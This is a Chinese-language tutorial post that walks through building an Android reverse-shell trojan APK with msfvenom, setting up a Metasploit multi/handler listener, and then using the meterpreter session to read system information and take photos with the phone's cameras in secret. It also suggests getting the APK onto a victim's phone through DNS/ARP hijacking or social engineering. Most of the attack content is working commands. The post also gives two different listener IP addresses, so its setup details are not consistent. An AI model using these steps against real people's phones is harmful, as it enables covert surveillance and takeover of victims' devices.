MSF是Metasploit的簡稱，Metasploit是一款開源的安全漏洞檢測工具，非常強大，分別有Windows版和Linux版，工具里集成了許多微軟公布的漏洞(0day)。

我這里做測試的系統(tǒng)是Backbox linux ，這是一款網(wǎng)絡滲透，信息安全評估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當然還有其它的 比如Kali linux 、Back Track這些等等。

環(huán)境：Backbox linux+MSF

目標：一臺安卓手機

既然是入侵安卓手機，肯定要先配置一個安卓木馬，那我們看看本機的IP

本機IP：192.168.1.6

在到終端輸入命令：msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木馬 現(xiàn)在在新版本中都用msfvenom代替了，所以有些朋友在終端輸入msfpayload的時候 會提示

msfpayload無法找到命令 所以使用msfvenom即可，這里LHOST 對應的是本機的IP地址 LPORT對應你要監(jiān)聽的端口 然后生成木馬的路徑

這樣我們就在/root/路徑下生成了一個APK的安卓木馬文件，至于木馬的免殺暫且不談。現(xiàn)在我們在來啟動MSF工具

輸入命令：msfconsole

然后輸入：

1. use exploit/multi/handler 加載模塊

2.set payload android/meterpreter/reverse_tcp 選擇Payload

3.show options 查看參數(shù)設置

我們看見payload里邊有兩個參數(shù)要設置 LHOST和LPORT 表示地址和端口 默認的端口是4444 現(xiàn)在我們來更改設置

1.set LHOST 192.168.1.6 這里的地址設置成我們剛才生成木馬的IP地址

2.set LPORT 5555 這里的端口設置成剛才我們生成木馬所監(jiān)聽的端口

3.exploit 開始執(zhí)行漏洞 開始監(jiān)聽...

OK，一切準備工作準備就緒。?！，F(xiàn)在要做的就是把木馬文件搞到人家的手機上，思路有很多 可以DNS arp劫持欺騙 只要對方用手機下載文件 就會下載我們的木馬文件

還有社工什么等等的，這里我就簡單的把木馬文件弄我自己的手機上做測試

安裝完成后 會在桌面上生成一個MainActivity的程序圖標 這個就是我們剛才生成的木馬 當我們點擊了這個圖標 手機會沒有任何反應 其實木馬已經(jīng)開始運行起來了

我們可以在我們的MSF里看見有一個會話連接了

這樣對方的手機就就被我們控制了，查看手機系統(tǒng)信息，輸入命令 sysinfo

webcam_list查看手機攝影頭有幾個 這里顯示兩項 分別表示有前后兩個攝像頭

webcam_snap 隱秘拍照功能

后邊跟上參數(shù)-i 指定使用那個攝像頭拍照

可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上

還可以輸入命令webcam_stream 開啟攝像頭

其它的功能還有更多，以后再為大家依依介紹，希望這篇大家會喜歡。